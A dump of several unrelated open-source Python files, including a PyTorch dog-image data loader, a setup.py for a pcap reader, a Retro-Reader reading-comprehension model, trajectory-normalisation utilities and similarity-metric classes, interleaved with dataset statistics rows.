subgroup_lambda = {'african american': lambda sample: 'African American' in metadata['acc_to_race'][sample['exam']],
'asian': lambda sample: 'Asian' in metadata['acc_to_race'][sample['exam']] ,
'white': lambda sample: 'White' in metadata['acc_to_race'][sample['exam']] ,
'<= 55': lambda sample: metadata['acc_to_age'][sample['exam']] <= 55,
'> 55': lambda sample: metadata['acc_to_age'][sample['exam']] > 55,
'Non-dense': lambda sample: metadata['acc_to_density'][sample['exam']] in [1,2],
'Dense': lambda sample: metadata['acc_to_density'][sample['exam']] in [3,4],
}
return subgroup_lambda
def validate_args(args):
"""Checks whether certain args or arg combinations are valid.
Raises:
Exception if an arg or arg combination is not valid.
"""
if args.batch_size % args.batch_splits != 0:
raise ValueError(BATCH_SIZE_SPLIT_ERR.format(args.batch_size, args.batch_splits))
assert args.task in ['screening', 'progression']
| 67.581818 | 259 | 0.690207 | 2,058 | 14,868 | 4.830904 | 0.219145 | 0.061557 | 0.116274 | 0.042044 | 0.283444 | 0.248139 | 0.167069 | 0.119091 | 0.086099 | 0.077047 | 0 | 0.013059 | 0.191418 | 14,868 | 219 | 260 | 67.890411 | 0.813924 | 0.057506 | 0 | 0.0125 | 0 | 0.01875 | 0.417551 | 0.055779 | 0 | 0 | 0 | 0 | 0.0125 | 1 | 0.025 | false | 0 | 0.05625 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
622bd455d2dc22cd186c34a9e25351b6ead8cf6a | 2,597 | py | Python | src/data/data_loader.py | Hannemit/dog_breed_classifier | 3e9cc6abe8a4dcb91eebcd4aaacaa04502fe9682 | [
"MIT"
] | null | null | null | src/data/data_loader.py | Hannemit/dog_breed_classifier | 3e9cc6abe8a4dcb91eebcd4aaacaa04502fe9682 | [
"MIT"
] | null | null | null | src/data/data_loader.py | Hannemit/dog_breed_classifier | 3e9cc6abe8a4dcb91eebcd4aaacaa04502fe9682 | [
"MIT"
] | null | null | null | from torchvision import datasets
import torch
from src.data import data_transformer
import numpy as np
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
TRAIN_DATA_PATH = "data/raw/dogImages/train"
VALIDATION_DATA_PATH = "data/raw/dogImages/valid"
TEST_DATA_PATH = "data/raw/dogImages/test"
def get_loader(path_to_images, transformer, batch_size, num_workers, shuffle=True):
"""
get dataloaders for the specified images with given transformers, batch size, etc..
:param path_to_images: string, path to where the images are that we want in our loader
:param transformer: a transformer from torchvision.transforms. It tells us how each image is transformed as it is
loaded
:param batch_size: int, batch size
:param num_workers: int, number of workers
:param shuffle: boolean, if True then randomly shuffle the images
:return: torch data loader
"""
data = datasets.ImageFolder(path_to_images, transform=transformer)
loader = torch.utils.data.DataLoader(data, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers)
return loader
def get_all_loaders(batch_size=15):
"""
get the train, validation and test loaders
:param batch_size: int, batch size to use
:return: dict, with keys "train", "valid" and "test".
"""
train_transformer = data_transformer.data_transform_from_scratch
test_valid_transformer = data_transformer.data_transform_bare
train_loader = get_loader(TRAIN_DATA_PATH, train_transformer, batch_size=batch_size, num_workers=0)
valid_loader = get_loader(VALIDATION_DATA_PATH, test_valid_transformer, batch_size=batch_size, num_workers=0)
test_loader = get_loader(TEST_DATA_PATH, test_valid_transformer, batch_size=batch_size, num_workers=0)
return {'train': train_loader, 'valid': valid_loader, 'test': test_loader}
def get_test_loader(batch_size=15, path=""):
if not path:
path = TEST_DATA_PATH
return get_loader(path, data_transformer.data_transform_bare, batch_size=batch_size, num_workers=0)
def get_training_classnames(data_path=""):
"""
Get the names of all the classes that are present in the training data
:return: array of strings, each string i sa class name (a breed of dog)
"""
if not data_path:
data_path = TRAIN_DATA_PATH
data = datasets.ImageFolder(data_path, transform=data_transformer.data_transform_from_scratch)
class_names = np.array([item[4:].replace("_", " ") for item in data.classes])
return class_names
| 41.887097 | 118 | 0.736619 | 367 | 2,597 | 4.956403 | 0.27248 | 0.08906 | 0.032985 | 0.052227 | 0.258933 | 0.172073 | 0.100605 | 0.084662 | 0.062672 | 0.062672 | 0 | 0.004253 | 0.185214 | 2,597 | 61 | 119 | 42.57377 | 0.855388 | 0.291105 | 0 | 0 | 0 | 0 | 0.051358 | 0.041913 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.166667 | 0 | 0.433333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
622cd9a7d59c2d58ec91e014b73a475b41d3c1b7 | 2,279 | py | Python | setup.py | kostya13/pypcappy | 7ffce21a5747c737bd2011ca1abfdda5bcb0b376 | [
"MIT"
] | 1 | 2017-08-20T11:24:26.000Z | 2017-08-20T11:24:26.000Z | setup.py | kostya13/pypcappy | 7ffce21a5747c737bd2011ca1abfdda5bcb0b376 | [
"MIT"
] | 1 | 2016-09-14T07:04:53.000Z | 2016-10-21T12:51:58.000Z | setup.py | kostya13/pypcappy | 7ffce21a5747c737bd2011ca1abfdda5bcb0b376 | [
"MIT"
] | 1 | 2018-10-29T10:18:57.000Z | 2018-10-29T10:18:57.000Z | #!/usr/bin/env python3
import sys
if sys.version_info < (3,):
print('ERROR: Only Python 3 is supported')
sys.exit(-1)
# To use a consistent encoding
from codecs import open
from os import path, system
import re
import sys
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
user_options = [('pytest-args=', 'a', "Arguments to pass to py.test")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = []
def run_tests(self):
#import here, cause outside the eggs aren't loaded
import pytest
errno = pytest.main(self.pytest_args)
sys.exit(errno)
if sys.argv[-1] == 'publish':
os.system('python setup.py sdist upload')
sys.exit()
with open('pypcappy/__init__.py', 'r') as fd:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
fd.read(), re.MULTILINE).group(1)
if not version:
raise RuntimeError('Cannot find version information')
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
name = 'pypcappy',
version = version,
description = 'Pure Python3 PcapNg reader',
long_description = long_description,
long_description_content_type = 'text/markdown',
author = 'Guy Taylor',
author_email = 'thebigguy.co.uk@gmail.com',
url = 'https://github.com/TheBiggerGuy/pypcappy',
packages = find_packages(exclude=['docs', 'tests']),
package_data={'': ['LICENSE', 'README.md']},
zip_safe=False,
install_requires=[],
tests_require=['pytest'],
cmdclass = {'test': PyTest},
keywords = ['pcap'],
license = 'MIT',
classifiers = (
'Development Status :: 3 - Alpha',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy'
),
)
| 29.597403 | 74 | 0.647652 | 275 | 2,279 | 5.250909 | 0.530909 | 0.051939 | 0.069252 | 0.041551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006132 | 0.212813 | 2,279 | 76 | 75 | 29.986842 | 0.798774 | 0.081176 | 0 | 0.035088 | 0 | 0 | 0.31259 | 0.02202 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035088 | false | 0.017544 | 0.140351 | 0 | 0.210526 | 0.017544 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
623161e9645acd3a9a726c1af45abce8e60f271b | 17,061 | py | Python | uf/application/retro_reader.py | yupeijei1997/unif | 16685a89446e6ce14080439162a9bfd0c75f0521 | [
"Apache-2.0"
] | 1 | 2021-05-15T12:07:40.000Z | 2021-05-15T12:07:40.000Z | uf/application/retro_reader.py | yupeijei1997/unif | 16685a89446e6ce14080439162a9bfd0c75f0521 | [
"Apache-2.0"
] | null | null | null | uf/application/retro_reader.py | yupeijei1997/unif | 16685a89446e6ce14080439162a9bfd0c75f0521 | [
"Apache-2.0"
] | null | null | null | # coding:=utf-8
# Copyright 2020 Tencent. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' Applications based on Retro-Reader. '''
import numpy as np
from uf.tools import tf
from .base import MRCModule
from .bert import BERTVerifierMRC, get_bert_config
from .albert import get_albert_config
from uf.modeling.bert import BERTEncoder
from uf.modeling.albert import ALBERTEncoder
from uf.modeling.retro_reader import RetroReaderDecoder
from uf.tokenization.word_piece import get_word_piece_tokenizer
import uf.utils as utils
class RetroReaderMRC(BERTVerifierMRC, MRCModule):
''' Machine reading comprehension on Retro-Reader. '''
_INFER_ATTRIBUTES = BERTVerifierMRC._INFER_ATTRIBUTES
def __init__(self,
config_file,
vocab_file,
max_seq_length=256,
init_checkpoint=None,
output_dir=None,
gpu_ids=None,
do_lower_case=True,
reading_module='bert',
matching_mechanism='cross-attention',
beta_1=0.5,
beta_2=0.5,
threshold=1.0,
truncate_method='longer-FO'):
super(MRCModule, self).__init__(
init_checkpoint, output_dir, gpu_ids)
self.batch_size = 0
self.max_seq_length = max_seq_length
self.truncate_method = truncate_method
self.beta_1 = beta_1
self.beta_2 = beta_2
self._do_lower_case = do_lower_case
self._on_predict = False
self._reading_module = reading_module
self._matching_mechanism = matching_mechanism
self._threshold = threshold
self.__init_args__ = locals()
if reading_module == 'albert':
self.bert_config = get_albert_config(config_file)
else:
self.bert_config = get_bert_config(config_file)
assert reading_module in ('bert', 'roberta', 'albert', 'electra'), (
'Invalid value of `reading_module`: %s. Pick one from '
'`bert`, `roberta`, `albert` and `electra`.')
assert matching_mechanism in (
'cross-attention', 'matching-attention'), (
'Invalid value of `matching_machanism`: %s. Pick one from '
'`cross-attention` and `matching-attention`.')
self.tokenizer = get_word_piece_tokenizer(vocab_file, do_lower_case)
self._key_to_depths = get_key_to_depths(
self.bert_config.num_hidden_layers)
if '[CLS]' not in self.tokenizer.vocab:
self.tokenizer.add('[CLS]')
self.bert_config.vocab_size += 1
tf.logging.info('Add necessary token `[CLS]` into vocabulary.')
if '[SEP]' not in self.tokenizer.vocab:
self.tokenizer.add('[SEP]')
self.bert_config.vocab_size += 1
tf.logging.info('Add necessary token `[SEP]` into vocabulary.')
def convert(self, X=None, y=None, sample_weight=None, X_tokenized=None,
is_training=False):
self._assert_legal(X, y, sample_weight, X_tokenized)
if is_training:
assert y is not None, '`y` can\'t be None.'
n_inputs = None
data = {}
# convert X
if X or X_tokenized:
tokenized = False if X else X_tokenized
X_target = X_tokenized if tokenized else X
(input_ids, input_mask, query_mask, segment_ids,
doc_ids, doc_text, doc_start) = self._convert_X(
X_target, tokenized=tokenized)
data['input_ids'] = np.array(input_ids, dtype=np.int32)
data['input_mask'] = np.array(input_mask, dtype=np.int32)
data['query_mask'] = np.array(query_mask, dtype=np.int32)
data['segment_ids'] = np.array(segment_ids, dtype=np.int32)
n_inputs = len(input_ids)
# backup for answer mapping
if self._on_predict:
self._tokenized = tokenized
self._X_target = X_target
if n_inputs < self.batch_size:
self.batch_size = max(n_inputs, len(self._gpu_ids))
# convert y
if y:
label_ids, has_answer = self._convert_y(
y, doc_ids, doc_text, doc_start, tokenized)
data['label_ids'] = np.array(label_ids, dtype=np.int32)
data['has_answer'] = np.array(has_answer, dtype=np.int32)
# convert sample_weight
if is_training or y:
sample_weight = self._convert_sample_weight(
sample_weight, n_inputs)
data['sample_weight'] = np.array(sample_weight, dtype=np.float32)
return data
def _convert_X(self, X_target, tokenized):
# tokenize input texts
segment_input_tokens = []
for ex_id, example in enumerate(X_target):
try:
segment_input_tokens.append(
self._convert_x(example, tokenized))
except Exception:
raise ValueError(
'Wrong input format (line %d): \'%s\'. '
'An untokenized example: '
'`X = [{\'doc\': \'...\', \'question\': \'...\', ...}, '
'...]`' % (ex_id, example))
# backup for answer mapping
if self._on_predict:
self._input_tokens = []
input_ids = []
input_mask = []
query_mask = []
segment_ids = []
doc_ids = []
doc_text = []
doc_start = []
for ex_id, segments in enumerate(segment_input_tokens):
_input_tokens = ['[CLS]']
_input_ids = []
_input_mask = [1]
_query_mask = [1]
_segment_ids = [0]
_doc_tokens = segments.pop('doc')
segments = list(segments.values()) + [_doc_tokens]
utils.truncate_segments(
segments, self.max_seq_length - len(segments) - 1,
truncate_method=self.truncate_method)
_doc_tokens = segments[-1]
for s_id, segment in enumerate(segments):
_segment_id = min(s_id, 1)
_input_tokens.extend(segment + ['[SEP]'])
_input_mask.extend([1] * (len(segment) + 1))
if s_id == 0:
_query_mask.extend([1] * (len(segment) + 1))
_segment_ids.extend([_segment_id] * (len(segment) + 1))
_doc_start = len(_input_tokens) - len(_doc_tokens) - 1
# backup for answer mapping
if self._on_predict:
self._input_tokens.append(_input_tokens)
_input_ids = self.tokenizer.convert_tokens_to_ids(_input_tokens)
_doc_ids = _input_ids[_doc_start: -1]
# padding
for _ in range(self.max_seq_length - len(_input_ids)):
_input_ids.append(0)
_input_mask.append(0)
_segment_ids.append(0)
for _ in range(self.max_seq_length - len(_query_mask)):
_query_mask.append(0)
input_ids.append(_input_ids)
input_mask.append(_input_mask)
query_mask.append(_query_mask)
segment_ids.append(_segment_ids)
doc_ids.append(_doc_ids)
doc_text.append(X_target[ex_id]['doc'])
doc_start.append(_doc_start)
return (input_ids, input_mask, query_mask, segment_ids,
doc_ids, doc_text, doc_start)
def _set_placeholders(self, target, on_export=False, **kwargs):
self.placeholders = {
'input_ids': utils.get_placeholder(
target, 'input_ids',
[None, self.max_seq_length], tf.int32),
'input_mask': utils.get_placeholder(
target, 'input_mask',
[None, self.max_seq_length], tf.int32),
'query_mask': utils.get_placeholder(
target, 'query_mask',
[None, self.max_seq_length], tf.int32),
'segment_ids': utils.get_placeholder(
target, 'segment_ids',
[None, self.max_seq_length], tf.int32),
'label_ids': utils.get_placeholder(
target, 'label_ids',
[None, 2], tf.int32),
'has_answer': utils.get_placeholder(
target, 'has_answer',
[None], tf.int32),
}
if not on_export:
self.placeholders['sample_weight'] = utils.get_placeholder(
target, 'sample_weight',
[None], tf.float32)
def _forward(self, is_training, split_placeholders, **kwargs):
def _get_encoder(model_name):
if model_name == 'bert' or model_name == 'roberta':
sketchy_encoder = BERTEncoder(
bert_config=self.bert_config,
is_training=is_training,
input_ids=split_placeholders['input_ids'],
input_mask=split_placeholders['input_mask'],
segment_ids=split_placeholders['segment_ids'],
scope='bert',
**kwargs)
elif model_name == 'albert':
sketchy_encoder = ALBERTEncoder(
albert_config=self.bert_config,
is_training=is_training,
input_ids=split_placeholders['input_ids'],
input_mask=split_placeholders['input_mask'],
segment_ids=split_placeholders['segment_ids'],
scope='bert',
**kwargs)
elif model_name == 'electra':
sketchy_encoder = BERTEncoder(
bert_config=self.bert_config,
is_training=is_training,
input_ids=split_placeholders['input_ids'],
input_mask=split_placeholders['input_mask'],
segment_ids=split_placeholders['segment_ids'],
scope='electra',
**kwargs)
return sketchy_encoder
sketchy_encoder = _get_encoder(self._reading_module)
intensive_encoder = sketchy_encoder #TODO: experiment with different encoder
decoder = RetroReaderDecoder(
bert_config=self.bert_config,
is_training=is_training,
sketchy_encoder=sketchy_encoder,
intensive_encoder=intensive_encoder,
query_mask=split_placeholders['query_mask'],
label_ids=split_placeholders['label_ids'],
has_answer=split_placeholders['has_answer'],
sample_weight=split_placeholders.get('sample_weight'),
scope='retro_reader',
matching_mechanism=self._matching_mechanism,
beta_1=self.beta_1,
beta_2=self.beta_2,
threshold=self._threshold,
trainable=True,
**kwargs)
(total_loss, losses, probs, preds) = decoder.get_forward_outputs()
return (total_loss, losses, probs, preds)
def _get_fit_ops(self, as_feature=False):
ops = [self._train_op,
self._preds['verifier_preds'],
self._preds['mrc_preds'],
self._losses['sketchy_losses'],
self._losses['intensive_losses']]
if as_feature:
ops.extend([self.placeholders['label_ids']])
ops.extend([self.placeholders['has_answer']])
return ops
def _get_fit_info(self, output_arrays, feed_dict, as_feature=False):
if as_feature:
batch_labels = output_arrays[-2]
batch_has_answer = output_arrays[-1]
else:
batch_labels = feed_dict[self.placeholders['label_ids']]
batch_has_answer = feed_dict[
self.placeholders['has_answer']]
# verifier accuracy
batch_has_answer_preds = output_arrays[1]
has_answer_accuracy = np.mean(
batch_has_answer_preds == batch_has_answer)
# mrc exact match & f1
batch_preds = output_arrays[2]
for i in range(len(batch_has_answer_preds)):
if batch_has_answer_preds[i] == 0:
batch_preds[i] = 0
exact_match, f1 = self._get_em_and_f1(batch_preds, batch_labels)
# sketchy loss
batch_sketchy_losses = output_arrays[3]
sketchy_loss = np.mean(batch_sketchy_losses)
# intensive loss
batch_intensive_losses = output_arrays[4]
intensive_loss = np.mean(batch_intensive_losses)
info = ''
info += ', has_ans_accuracy %.4f' % has_answer_accuracy
info += ', exact_match %.4f' % exact_match
info += ', f1 %.4f' % f1
info += ', sketchy_loss %.6f' % sketchy_loss
info += ', intensive_loss %.6f' % intensive_loss
return info
def _get_predict_ops(self):
return [self._probs['verifier_probs'],
self._preds['verifier_preds'],
self._probs['mrc_probs'],
self._preds['mrc_preds']]
def _get_predict_outputs(self, batch_outputs):
n_inputs = len(list(self.data.values())[0])
output_arrays = list(zip(*batch_outputs))
# verifier preds & probs
verifier_probs = utils.transform(output_arrays[0], n_inputs)
verifier_preds = utils.transform(output_arrays[1], n_inputs)
# mrc preds & probs
preds = []
probs = utils.transform(output_arrays[2], n_inputs)
mrc_preds = utils.transform(output_arrays[3], n_inputs)
for ex_id, _preds in enumerate(mrc_preds):
_start, _end = int(_preds[0]), int(_preds[1])
if verifier_preds[ex_id] == 0 or _start == 0 or _end == 0 \
or _start > _end:
preds.append(None)
continue
_tokens = self._input_tokens[ex_id]
if self._tokenized:
_span_tokens = _tokens[_start: _end + 1]
preds.append(_span_tokens)
else:
_sample = self._X_target[ex_id]
_text = [_sample[key] for key in _sample if key != 'doc']
_text.append(_sample['doc'])
_text = ' '.join(_text)
_mapping_start, _mapping_end = utils.align_tokens_with_text(
_tokens, _text, self._do_lower_case)
_text_start = _mapping_start[_start]
_text_end = _mapping_end[_end]
_span_text = _text[_text_start: _text_end]
preds.append(_span_text)
outputs = {}
outputs['verifier_probs'] = verifier_probs
outputs['verifier_preds'] = verifier_preds
outputs['mrc_probs'] = probs
outputs['mrc_preds'] = preds
return outputs
def _get_score_ops(self):
return [self._preds['verifier_preds'],
self._preds['mrc_preds'],
self._losses['sketchy_losses'],
self._losses['intensive_losses']]
def _get_score_outputs(self, batch_outputs):
n_inputs = len(list(self.data.values())[0])
output_arrays = list(zip(*batch_outputs))
# verifier accuracy
has_answer_preds = utils.transform(output_arrays[0], n_inputs)
has_answer_accuracy = np.mean(
has_answer_preds == self.data['has_answer'])
# mrc exact match & f1
preds = utils.transform(output_arrays[1], n_inputs)
for i in range(len(has_answer_preds)):
if has_answer_preds[i] == 0:
preds[i] = 0
exact_match, f1 = self._get_em_and_f1(preds, self.data['label_ids'])
# sketchy loss
sketchy_losses = utils.transform(output_arrays[2], n_inputs)
sketchy_loss = np.mean(sketchy_losses)
# intensive loss
intensive_losses = utils.transform(output_arrays[3], n_inputs)
intensive_loss = np.mean(intensive_losses)
outputs = {}
outputs['has_ans_accuracy'] = has_answer_accuracy
outputs['exact_match'] = exact_match
outputs['f1'] = f1
outputs['sketchy_loss'] = sketchy_loss
outputs['intensive_loss'] = intensive_loss
return outputs
def get_key_to_depths(num_hidden_layers):
key_to_depths = {
'/embeddings': num_hidden_layers + 2,
'/pooler/': 1,
'retro_reader/': 0}
for layer_idx in range(num_hidden_layers):
key_to_depths['/layer_%d/' % layer_idx] = \
num_hidden_layers - layer_idx + 1
return key_to_depths
| 39.04119 | 87 | 0.585663 | 1,953 | 17,061 | 4.761393 | 0.145929 | 0.024196 | 0.012905 | 0.013765 | 0.28089 | 0.2311 | 0.213356 | 0.191418 | 0.155286 | 0.146145 | 0 | 0.010543 | 0.31616 | 17,061 | 436 | 88 | 39.130734 | 0.786492 | 0.060313 | 0 | 0.163743 | 0 | 0 | 0.084631 | 0.002627 | 0 | 0 | 0 | 0.002294 | 0.011696 | 1 | 0.038012 | false | 0 | 0.02924 | 0.005848 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62334aab72e9dc9aef0157492f85a79fa4791068 | 4,124 | py | Python | utils.py | argunaykut/randi | 514fc95a81fac57732116201ebdf6f46edef5028 | [
"MIT"
] | 2 | 2021-09-24T19:25:39.000Z | 2022-01-22T06:21:40.000Z | utils.py | argunaykut/randi | 514fc95a81fac57732116201ebdf6f46edef5028 | [
"MIT"
] | null | null | null | utils.py | argunaykut/randi | 514fc95a81fac57732116201ebdf6f46edef5028 | [
"MIT"
] | 1 | 2022-02-20T21:49:48.000Z | 2022-02-20T21:49:48.000Z |
import numpy as np
def data_norm(traj_set,dim,task,thr=1e-10):
'''function to normalize a set of trajectories of the same length l.
takes as input a vector of length N l*dim
for segmenation task, set task=3. It returns array of normalized displacements of dimension (N,dim,l-1)
for other tasks, it returns array of normalized displacements of dimension (N,dim,l) where the last entries are all 0
'''
N = len(traj_set)
r = np.array(traj_set).reshape(N,dim,-1)
r_3 = np.copy(r)
r = np.diff(r,axis=2) # get the increments
for dm in range(dim):
x = np.copy(r[:,dm,:]) # get x data
sx = np.std(x,axis=1)
x = (x-np.mean(x,axis=1).reshape(len(x),1)) / np.where(sx>thr,sx,1).reshape(len(x),1) # normalize x data
if task == 3:
x = np.concatenate((x,np.zeros((N,1))),axis=1) #if the task is 3, each dimension of the trajectory gets a 0 at the end
r_3[:,dm,:] = np.copy(x)
else:
r[:,dm,:] = np.copy(x)
if task == 3:
return r_3
else:
return r
def data_reshape(r,bs,dim):
'''function to prepare a set of trajectories of the same length into
the shape required by the network. bs is the block size.
takes as input array of normalized displacements of dimension (N,dim,js)
The function automatically cuts the trajectory to
the largest multiple of bs. The reshaping e.g. for a 2-dimensional trajectory
for a net working on blocks of dimension 4 gives the trajectory reshaped as
{ [x0,y0, x1, y1], [x2,y2, x3,y3], ...} '''
js = r.shape[-1]
N = r.shape[0]
rl=int(dim*(js)/bs)*int(bs/dim) #cutting the trajectory to fit to multiple of dimensione used by net
rt = np.transpose(r[:,:,:rl],axes = [0,2,1])
# print(rl, rt.shape)
rs_traj = rt.reshape(N,-1,bs)
return rs_traj
def many_net_uhd(nets,traj_set,centers,dim,task,thr=1e-10,skip=[]):
"""Function to apply a combination of the nearest nets to a set of trajectories of the same length
Takes as input list of networks, data set and
the vector centers of where the different nets
were trained on.
The input trajectory is given by an array where the dimensions are concatenated:
traj=(x_0...xN,y0,...yN)
The 2-dimensional trajectory is reshaped according to the network dimension.
e.g. for a net working on blocks of dimension 4 the trajectory is reshaped as
{ [x0,y0, x1, y1], [x2,y2, x3,y3], ...}
All tajectories need to have the same length
"""
centers=np.asarray(centers)
n_nets=len(nets) #number of nets we can use
#obtaining the shape of the input required by each of the networks
di=[]
for n in nets:
di.append(n.layers[0].input_shape[-1])
di=np.asarray(di)
X = np.asarray(traj_set)
jj= X.shape[1] #length of trajectory times dimension
js=int(jj/dim) #length of trajectory
#choosing which net to use
if js<=centers[0]:
k=0
elif js>np.max(centers):
k=n_nets-1
else:
k=np.argmax(js<np.asarray(centers))-1
#taking the diff and reshaping the trajectory
r_norm = data_norm(traj_set,dim,task=task,thr=thr)
rs_traj = data_reshape(r_norm,bs = di[k],dim = dim)
pr_b=nets[k].predict(rs_traj).flatten()
if ((k<n_nets-1) and np.isin(k,skip,invert=True) ):
#distance between the net used and the following one
ran=centers[k+1]-centers[k]
d=(js-centers[k])/ran #distance between traj len and center of net used
if d>0:
rs_traj_b = data_reshape(r_norm,bs = di[k+1],dim=dim)
pr_2b=nets[k+1].predict(rs_traj_b).flatten()
pr_b=((1-d)*pr_b+d*pr_2b)
return np.asarray(pr_b).flatten()
def my_atan(x1,x2):
'''function to compute the arctan'''
y=np.arctan2(x1,x2)
b=y<0
c=b.astype(int)*(2*np.pi)
d=y+c
return d; | 33.528455 | 139 | 0.602813 | 686 | 4,124 | 3.567055 | 0.266764 | 0.014303 | 0.021251 | 0.022068 | 0.207192 | 0.187985 | 0.170004 | 0.15284 | 0.093993 | 0.066204 | 0 | 0.025312 | 0.281523 | 4,124 | 123 | 140 | 33.528455 | 0.80054 | 0.45805 | 0 | 0.084746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067797 | false | 0 | 0.016949 | 0 | 0.169492 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6234596f6c3722f3884ddc77d0c84e478d6bfc99 | 3,476 | py | Python | langbrainscore/interface/metrics.py | language-brainscore/langbrainscore | 61c86e5de070482561a721372b6040d1b310d038 | [
"MIT"
] | null | null | null | langbrainscore/interface/metrics.py | language-brainscore/langbrainscore | 61c86e5de070482561a721372b6040d1b310d038 | [
"MIT"
] | 22 | 2022-02-25T14:40:11.000Z | 2022-03-30T15:35:50.000Z | langbrainscore/interface/metrics.py | language-brainscore/langbrainscore | 61c86e5de070482561a721372b6040d1b310d038 | [
"MIT"
] | null | null | null | import typing
from abc import ABC, abstractmethod
import numpy as np
from langbrainscore.interface.cacheable import _Cacheable
class _Metric(_Cacheable, ABC):
# class _Metric(ABC):
"""
checks that two arrays are comparable for a given similarity metric,
then applies that metric to those inputs and returns score(s)
Args:
np.ndarray: X
np.ndarray: Y
Returns:
Typing.Union[np.ndarray,np.float]: score(s)
Raises:
ValueError: X and Y must be 1D or 2D arrays.
ValueError: X and Y must have the same number of samples.
ValueError: for most metrics, X and Y must have same number of dimensions.
"""
def __init__(self):
pass
def __call__(
self, X: np.ndarray, Y: np.ndarray
) -> typing.Union[np.float, np.ndarray]:
if X.ndim == 1:
X = X.reshape(-1, 1)
if Y.ndim == 1:
Y = Y.reshape(-1, 1)
if any(y.ndim != 2 for y in [X, Y]):
raise ValueError("X and Y must be 1D or 2D arrays.")
if X.shape[0] != Y.shape[0]:
raise ValueError("X and Y must have the same number of samples.")
if self.__class__.__name__ not in ["RSA", "CKA"]:
if X.shape[1] != Y.shape[1]:
raise ValueError("X and Y must have the same number of dimensions.")
return self._apply_metric(X, Y)
@abstractmethod
def _apply_metric(
self, X: np.ndarray, Y: np.ndarray
) -> typing.Union[np.float, np.ndarray]:
raise NotImplementedError
class _VectorMetric(_Metric):
"""
subclass of _Metric that applies relevant vector similarity metric
along each column of the input arrays.
"""
def __init__(self, reduction=None):
"""
args:
callable: reduction (can also be None or False)
raises:
TypeError: if reduction argument is not callable.
"""
if reduction:
if not callable(reduction):
raise TypeError("Reduction argument must be callable.")
self._reduction = reduction
super().__init__()
def _apply_metric(
self, X: np.ndarray, Y: np.ndarray
) -> typing.Union[np.float, np.ndarray]:
"""
internal function that applies scoring function along each array dimension
and then optionally applies a reduction, e.g., np.mean
args:
np.ndarray: X
np.ndarray: Y
"""
scores = np.zeros(X.shape[1])
for i in range(scores.size):
x = X[:, i]
y = Y[:, i]
nan = np.isnan(x) | np.isnan(y)
try:
scores[i] = self._score(x[~nan], y[~nan])
except:
scores[i] = np.nan
if self._reduction:
return self._reduction(scores)
if len(scores) == 1:
return scores[0]
return scores
@abstractmethod
def _score(self, X: np.ndarray, Y: np.ndarray) -> np.float:
raise NotImplementedError
class _MatrixMetric(_Metric):
"""
interface for similarity metrics that operate over entire matrices, e.g., RSA
"""
def __init__(self):
super().__init__()
def _apply_metric(self, X: np.ndarray, Y: np.ndarray) -> np.float:
score = self._score(X, Y)
return score
@abstractmethod
def _score(self, X: np.ndarray, Y: np.ndarray) -> np.float:
raise NotImplementedError
